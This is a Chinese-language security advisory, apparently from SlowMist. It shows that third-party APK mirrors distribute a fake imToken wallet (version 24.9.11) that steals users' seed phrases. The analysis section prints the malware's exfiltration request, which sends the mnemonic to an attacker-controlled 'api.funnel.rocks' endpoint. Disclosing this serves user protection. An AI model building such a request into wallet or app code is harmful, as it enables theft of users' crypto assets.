慢霧:Web3 假錢包第三方源調查分析

By: 山& 耀

背景

基於區塊鏈技術的Web3 正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3 與Web2 是兩個截然不同的世界。 Web3 世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3 世界中,錢包則是進入Web3 世界的入口以及通行證。

當你通過錢包在Web3 世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包“登錄”;這與我們傳統意義上的“登錄” 不同,在Web2 世界中,每個應用之間的賬戶不全是互通的。但在Web3 的世界中,所有應用都是統一使用錢包去進行“登錄”,我們可以看到“登錄” 錢包時顯示的不是“Login with Wallet”,取而代之的是“Connect Wallet”。而錢包是你在Web3 世界中的唯一通行證。

俗話說高樓之下必有陰影,在如此火熱的Web3 世界裡,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

在Android 環境下,由於很多手機不支持Google Play 或者因為網絡問題,很多人會從其他途徑下載Google Play 的應用,比如:apkcombo、apkpure 等第三方下載站,這些站點往往標榜自己App 是從Google Play 鏡像下載的,但是其真實安全性如何呢?

網站分析

鑑於下載途徑眾多,我們今天以apkcombo 為例看看,apkcombo 是一個第三方應用市場,它提供的應用據官方說大部分來源於其他正規應用商店,但事實是否真如官方所說呢?

我們先看下apkcombo 的流量有多大:

據數據統計站點similarweb 統計,apkcombo 站點:

全球排名:1,809

國家排名:7,370

品類排名:168

我們可以看到它的影響力和流量都非常大。

它默認提供了一款chrome APK 下載插件,我們發現這款插件的用戶數達到了10 W+:

那麼回到我們關注的Web3 領域中錢包方向,用戶如果從這裡下載的錢包應用安全性如何?

我們拿知名的imToken 錢包為例,其Google Play 的正規下載途徑為:

https://play.google.com/store/apps/details?id=im.token.app

由於很多手機不支持Google Play 或者因為網絡問題,很多人會從這裡下載Google Play 的應用。

而apkcombo 鏡像站的下載路徑為:

https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo 提供的版本為24.9.11,經由imToken 確認後,這是一個並不存在的版本!證實這是目前市面上假imToken 錢包最多的一個版本。

在編寫本文時imToken 錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo 上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的Google Play 的下載量信息,安全起見,我們覺得有必要披露這個惡意App 的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown

下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown 任意註冊即可發布App,這導致釣魚的成本變得極低:

錢包分析

在之前我們已經分析過不少假錢包的案例,如:2021-11-24 我們披露:《慢霧:假錢包App 已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo 提供版本為24.9.11 這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK 代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖,最早的“api.funnel.rocks” 證書出現在2022-06-03,也就是攻擊開始的大概時間:

俗話說一圖胜千言,最後我們畫一個流程圖:

總結

目前這種騙局活動不僅活躍,甚至有擴大範圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認准官方下載渠道並從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產並卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認准以下主流錢包App 官方網址:

qRJoIPySQCWQALqaWQmfpOAvDHus0rwoxN1oo1ZK.png

請持續關注慢霧安全團隊,更多Web3 安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken 官方提供的驗證支持。

由於保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。

Total
0
Shares
Related Posts